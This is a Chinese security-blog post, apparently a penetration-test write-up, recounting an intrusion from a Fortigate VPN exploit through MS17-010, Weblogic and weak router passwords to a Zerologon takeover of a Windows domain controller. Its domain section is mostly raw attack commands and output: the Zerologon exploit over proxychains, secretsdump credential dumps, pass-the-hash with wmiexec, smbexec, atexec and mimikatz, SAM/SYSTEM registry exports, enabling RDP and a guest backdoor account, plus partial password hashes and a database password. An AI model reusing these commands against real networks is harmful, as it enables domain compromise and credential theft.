扫码领资料
获网安教程
本文由掌控安全学院 - flysheep 投稿
来Track安全社区投稿~
千元稿费!还有保底奖励~(https://bbs.zkaq.cn)
前言
作为一个资深的安服仔,经常要去客户那里做渗透测试的。最近在做项目的时候,领导让我带带徒弟,于是把整个过程做了详细记录,重点是域环境的渗透,有很多碰到的问题和解决思路,大佬勿喷哈哈,为了脱敏,其中涉及的域名全部用*.COM代替。
外网突破
确定目标后,我一般是第一时间用各种信息搜集工具招呼过去。凭我的经验来看,goby由于集成了端口扫描、指纹识别、目录扫描、漏洞扫描等功能,信息搜集的效果还是比较好的,但是尴尬的是针对该目标啥也扫不出来(可能全端口扫会有结果,但是太慢了)
img
goby不灵就换个工具和思路,这里我利用网络空间测绘平台fofa发现该公司部署在公网Fortigate VPN设备。恰好存在CVE-2020-7042漏洞没有修复,于是我利用网上公开的exp获取部分员工VPN登录账号,成功进入公司内网:
img
资产扫描与常规漏洞
利用fscan等工具对目标内网资产进行扫描探测,发现网段10段存在大量存活主机。通过SMB口令碰撞、SQLServer提权、SSH弱口令、MS17010等方式获取了几台内网主机权限。接下来通过拿到的权限,收集本地shadow文件、浏览器记录、数据库配置文件、桌面敏感信息等,继续做成密码字典,重新进行内网各种口令爆破,继续拿权限,这样周而复始做过几轮之后,拿了很多权限,有windows主机,也有linux主机,具体步骤我记录了几台:
通过扫描结果首先看到主机151上存在weblogic服务
img
该服务是存在CVE-2016-0638漏洞,于是利用网上公开的exp工具直接getshell了,通过id指令可以看到我们获取的是oracle用户权限
img
经典的MS17010漏洞利用:
接着我们遇到了好几台主机都存在经典的ms17010漏洞没有修复的情况。 第一台:主机24存在MS17010漏洞,利用msf获取shell的过程如下
img
利用mimikatz抓取出明文密码
img
第二台:主机32存在MS17010漏洞,利用MSF成功获取控制权限:
img
加载mimikatz模块读取明文密码
img
开启3389远程桌面并成功登录,发现该主机有核心业务-综合信息系统。为了防止权限丢失,激活了guest用户,修改其密码为Hello123456@1_2_3
第三台:主机55存在MS17010漏洞,但是只能执行command弹不出meterpreter
img
这里只能加载ms17_010_command模块来执行相应的cmd命令,发现有user用户,列出其桌面目录
img
网络通信设备弱口令:
目标公司下属的通信部门一台NAS主机中存放一张路由交换网络拓扑图,并且泄露了部分路由器的管理员账户。根据此图,定位所有路由器和交换机IP地址,利用超级弱口令检查工具,成功获取权限的有十余台,弱口令账号是admin/目标名称缩写@123:
img
另外还有几台思科路由器(20/116/224),账号密码也是弱口令cisco/cisco 随便选择一台思科路由器,利用上面获得的弱口令可以成功登录,其Web界面登录如下:
安全防护设备集群:
域环境渗透
add key="connectionstring" value="Data Source=SERVER;Initial Catalog=zxzdb;Persist Security Info=True;User ID=sa;password=zxz@123"
------------------- Mscache passwords -----------------
administrator:2a519d1804e93b3455:ZXZ:*.COM
------------------- Hashdump passwords -----------------
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5db8fba761c1008a51d4c95ab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:f86cef930fd92366d89f140d:::
PC:1002:aad3b435b51404eeaad3b435b51404ee:04a6f13a48cb6b:::
root@perfect-pod-10:~/CVE-2020-1472# proxychains python3 cve-2020-1472-exploit.py SERVERZXZ2 10.77.9.4
ProxyChains-3.1 (http://proxychains.sf.net)
Performing authentication attempts...
|S-chain|-<>-VPS:57777-<><>-10.77.9.4:135-<><>-OK
|S-chain|-<>-VPS:57777-<><>-10.77.9.4:49671-<><>-OK
======================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
root@perfect-pod-10:~/CVE-2020-1472# proxychains python3 secretsdump.py *.COM/SERVERZXZ2$@10.77.9.4 -no-pass
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
|S-chain|-<>-VPS:57777-<><>-10.77.9.4:445-<><>-OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
|S-chain|-<>-VPS:57777-<><>-10.77.9.4:135-<><>-OK
|S-chain|-<>-VPS:57777-<><>-10.77.9.4:49671-<><>-OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:92bae25563a498a86e6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6096cec445fecd524781:::
*.COMAAA:1115:aad3b435b51404eeaad3b435b51404ee:c389e095742d1111555ad:::
*.COMBBB:1121:aad3b435b51404eeaad3b435b51404ee:59b1d5b6406607ea0c2d:::
*.COMCCC:1126:aad3b435b51404eeaad3b435b51404ee:5396a651e07de633d5fd2:::
*.COMDDD:1128:aad3b435b51404eeaad3b435b51404ee:520cb9d17a2432fdb5:::
*.COMEEE:1129:aad3b435b51404eeaad3b435b51404ee:9b8cc5b8b55cc772d14379d:::
*.COMFFF:1132:aad3b435b51404eeaad3b435b51404ee:dd655ebdaf7e1db0d134cce:::
(这里因为有四百多条太多了,就省略掉了)
[*] ClearText passwords grabbed
*.COMDOC:CLEARTEXT:DOC
[*] Cleaning up...
PS C:UsersSheepMusicimpacket-0.11.0examples> python wmiexec.py -hashes aad3b435b51404eeaa1404ee:92bae25563a498a86e6 *.COM/administrator@10.77.9.4
reg save HKLMSYSTEM system.save
reg save HKLMSAM sam.save
reg save HKLMSECURITY security.save
lget system.save
lget sam.save
lget security.save
python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
$MACHINE.ACC: aad3b435b51404eeaad3b435b:c4f4f0ec1cf81a60dc058
root@perfect-pod-10:~/CVE-2020-1472/zerologon# proxychains python3 reinstall_original_pw.py SERVERZXZ2 10.77.9.4 c4f4f0ec1cf6fec0cc058
proxychains python3 secretsdump.py *.COM/SERVERZXZ2$@10.77.9.4 -no-pass
proxychains python3 secretsdump.py *.COM/administrator@10.77.9.4 -hashes aad3b435b51404eeaa4ee:cb136a448767792b498a86
python smbexec.py -hashes aad3b435b51404eeaad304ee:cb136a4487677a498 *.COM/administrator@10.77.9.69
python atexec.py -hashes :cb136677963a498a8e6 *.COM/administrator@10.77.9.69 "net user"
reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
sekurlsa::pth /user:administrator /domain:10.77.9.69 /ntlm:cb136a448763a498a6e6 "/run:mstsc.exe /restrictedadmin"
核心生产网渗透
总结
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
没看够~?欢迎关注!
分享本文到朋友圈,可以凭截图找老师领取
上千教程+工具+靶场账号哦
分享后扫码加我!
回顾往期内容
代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!
点赞+在看支持一下吧~感谢看官老爷~
你的点赞是我更新的动力
原文始发于微信公众号(sec0nd安全):实战 | 域环境下通过anydesk进入生产网
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论